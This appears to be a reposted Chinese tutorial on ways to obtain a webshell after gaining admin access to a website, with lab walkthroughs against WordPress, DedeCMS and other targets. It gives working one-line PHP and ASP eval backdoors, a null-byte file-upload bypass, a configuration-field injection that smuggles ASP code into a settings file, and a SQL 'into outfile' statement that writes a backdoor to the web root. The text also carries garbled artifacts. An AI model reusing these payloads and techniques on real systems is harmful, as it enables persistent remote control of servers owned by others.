大佬教程收集整理的这篇文章主要介绍了拿webshell的一些姿势,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
websHell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境c;也可以将其称做为一种网页后门。黑客在入侵了一个网站后c;通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起c;然后就可以使用浏览器来访问该后门文件了c;从而得到一个命令执行环境c;以达到控制网站服务器的目的。
顾名思义c;“web”的含义是显然需要服务器开放web服务c;“sHell”的含义是取得对服务器某种程度上的操作权限。websHell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于websHell其大多是以动态脚本的形式出现c;也有人称之为网站的后门工具。 更详细的解释参见:WebsHell和一句话木马
通过修改模块写入一句话c;网站再调用模板的时c;会自动加载这个模板c;运行后门。
通过后台的上传模块c;上传网页后门c;就可以拿到websHell
通过可控参数将恶意代码写入文件里c;即可获取websHell
上传zip文件c;在其加入websHell文件c;程序会自动解压c;将后门解压到网站目录c;可以获取websHell。
通过修改网站的配置文件c;直接把后门写到网站里
有的网站后台会存在远程图片下载功能c;但是没有对其后缀名进行限制c;导致可以下去websHell文件。
很多的asp网站 都存在备份功能c;上传有恶意的图片c;备份成脚本文件c;即可获取websHell
有的网站存在sql执行命令c;可以通过命令备份或导出一句话后门到指定网站目录c;即可获取websHell
有的编辑器存在上传漏洞c;通过编辑器漏洞可以获取网站的websHell。
使用内部靶场 12server6 c;以NAT模式运行c;设定为自动获取DNS、ip。之后启动护卫神-主机大师即可。
物理机修改hosts文件绑定靶机的地址即可。
在“外观”-“编辑”页面c;随意选择一个主题c;随意选择一个后缀是php的模板c;然后写入一句话木马。这里写入的是<?php phpinfo();eval($_POST['cmd']);?>
c;加上phpinfo主要是为了方便获知效果。
去靶机后台看看c;确实写入成功。文件路径: C:Hws.comHwsHostMasterwwwrootwww.cbi1.comwebwp-contentthemestwentysixteen404.php
保存模板c;然后访问路径。根据文件路径c;可以反推出其url地址: (或者可以百度下“外观”-“编辑”的地址c;或者自己本地搭建一下环境c;获知地址) http://www.cbi1.com/wp-content/themes/twentysixteen/404.php
看到我们预留的phpinfo页面c;说明地址没问题c;然后连接websHell管理工具。 连接蚁剑c;呃……页面显示有问题c;切换成别的编码方式依然失败。gg
连接菜刀
@H_985_197@
访问“模块”-“默认模板管理”c;这里选择 index.htm页面c;点击“修改”
那么c;浏览器一路后退到更新页面c;后缀保持为之前的htmlc;再看看原本的效果
再打开就是原本的正常主页了c;只不过在页面源代码中可以看见预留的一句话木马内容
准备个一句话木马:<?php phpinfo();eval($_POST['cmd']);?>
访问地址:http://www.cbi2.com/dede/
去靶机后台瞅瞅c;传上去了
访问一下websHell地址c;看到我们预留的phpinfo页面了c;说明地址没问题
连接菜刀成功。
<%eval request("cmd")%>
在路径后面添加 hack.asp%00 c;并对%00编码
进行URL编码之后c;正常情况下应该出现一个有点像汉字“口”的东西c;如果没有出现c;就说明哪里出问题了。 (也完全可能是编码成功c;只是字体原因导致的这种显示结果)
换个版本的BurpSuitec;并重置一下BurpSuite。显示出“口”了c;然后修改一下文件后缀c;上传失败。
上网查了一下c;是文件内容太少了c;填充些垃圾数据c;重新上传。
再次点击“上传”按钮后c;上传成功
成功连接菜刀
在“外观”-“主题”页面c;通过“添加”按钮添加zIP类型的主题c;之后网站会对其解压。
我们可以上网上找主题c;或者直接改个名字来套用网站的主题。我这里选择后者。 把网站后台的 twentysixteen 主题拿过来改个名字为 hackyouc;确认404.php 文件里存在一句话木马c;然后将hackyou文件夹打包成zipc;上传网站。
去靶机后台瞅一眼。上传成功了
访问websHell地址
连接websHell管理工具
通过以下位置来上传文件
<%eval request("cmd")%>
http://www.cbi9.com/templates/hack/hack.asp
smtp服务器的框中c;写入:smtp.163.com"%><%eval request(chr(35))%><% s="
连接菜刀:
直接写入一句话木马
连接菜刀
@H_417_607@
参见之前的文章:https://blog.csdn.net/weixin_44288604/article/details/120680334
换用自己的win7靶机
方式同第8节c;只不过这里不是在c;存在sql注入的位置写c;而是去phpR_206_11845@yadmin中写 SELEct '<?php phpinfo();eval($_POST[cmd]);?>' into outfile 'C:/phpstudy/www/hack.php'
页面有我们预留的phpinfo
连接菜刀
方式1:点击“编辑”按钮c;直接编辑
方式2:通过执行sql语句来进行修改
SELEct '<?php phpinfo();eval($_POST[cmd]);?>'
执行成功
看到预留的phpinfo页面
连接菜刀成功
WebsHell和一句话木马
以上是大佬教程为你收集整理的拿webshell的一些姿势全部内容,希望文章能够帮你解决拿webshell的一些姿势所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。